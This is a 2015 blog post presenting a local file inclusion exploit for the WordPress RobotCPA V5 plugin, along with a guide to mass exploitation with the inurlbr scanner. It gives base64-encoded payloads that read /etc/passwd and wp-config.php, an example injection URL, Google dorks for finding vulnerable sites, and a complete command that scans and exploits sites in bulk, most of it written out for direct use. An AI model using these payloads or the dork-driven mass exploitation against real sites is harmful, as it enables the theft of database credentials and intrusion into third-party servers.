quarta-feira, 24 de junho de 2015

WordPress RobotCPA Plugin V5 - Local File Inclusion - MASS EXPLOIT INURLBR

Exploring theme Plugin RobotCPA V5 CMS wordpress

Exploit Title: Wordpress Plugin RobotCPA V5 - Local File Include Exploit Author: T3N38R15 Vendor Homepage: http://robot-cpa.good-info.co/ Version: 5V Tested on: Windows (Firefox) / Linux (Firefox) Acess: https://www.exploit-db.com/exploits/37252/  The affected file is f.php and the get-parameter "l" is vulnerable to local file inclusion. We just need to base64 encode our injection.

Exploit Title: Wordpress Plugin RobotCPA V5 - Local File Include
Exploit Author: T3N38R15
Vendor Homepage: http://robot-cpa.good-info.co/
Version: 5V
Tested on: Windows (Firefox) / Linux (Firefox)
Acess: https://www.exploit-db.com/exploits/37252/


The affected file is f.php and the get-parameter "l" is vulnerable to local file inclusion.
We just need to base64 encode our injection.

POC:

string exploit:
php://filter/resource=./../../../wp-config.php
base64: cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==

string exploit: 
file:///etc/passwd
base64: 
ZmlsZTovLy9ldGMvcGFzc3dk

Exemple Injetion:
http://domain.com/wp-content/plugins/robotcpa/f.php?l={STRING_BASE64_XPL}

Mass exploitation with inurlbr
using get exploration parameters and scanner internal encoder

Exemple:
--exploit-get {you_get}
--exploit-get  "&index.php?id=10'´0x27"


base64 Encrypt values in base64.
     Example: base64({value})
     Usage:   base64(102030)
     Usage:   --exploit-get 'user?id=base64(102030)'

Let's use:
--exploit-get "&l=base64(file:///etc/passwd)"
or
--exploit-get "&l=base64(php://filter/resource=./../../../wp-config.php)"

Dork:
inurl:"/wp-content/plugins/robotcpa/"
inurl:"plugins/robotcpa/f.php?l="

Complete command
php inurlbr.php --dork 'inurl:"plugins/robotcpa/f.php?l="' --exploit-get "&l=base64(file:///etc/passwd)" -s vuln.txt -q 1,2,3,64

Internal validation script inurlbr

Exploring the server password file...

LOCAL FILE INCLUSION
Local File Inclusion (also known as LFI) is the process of including  files, that are already locally present on the server, through the  exploiting of vulnerable inclusion procedures implemented in the  application. 
https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
$validation['LOCAL-FILE-INCLUSION-01'] = '/root:/';
$validation['LOCAL-FILE-INCLUSION-02'] = 'root:x:0:0:';
$validation['LOCAL-FILE-INCLUSION-03'] = 'mysql:x:';
Finding any of these values the script alert as vulnerable.
Exploring the server wp-config.php file...

CMS WORDPRESS
As the name suggests, if the web application doesn’t check the file name required by the user, any malicious user can exploit this vulnerability to download sensitive files from the server.
Arbitrary File Download vulnerability file wp-config.php
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
http://www.acunetix.com/vulnerabilities/web/wordpress-plugin-slider-revolution-arbitrary-file-disclosure
$validation['CMS-WORDPRESS-01'] = "define('DB_NAME'";
$validation['CMS-WORDPRESS-02'] = "define('DB_USER'";
$validation['CMS-WORDPRESS-03'] = "define('DB_PASSWORD'";
$validation['CMS-WORDPRESS-04'] = "define('DB_HOST'";
Finding any of these values the script alert as vulnerable.

OUTPUT: 

Download:
http://github.com/googleinurl/SCANNER-INURLBR

Nenhum comentário:

Postar um comentário

............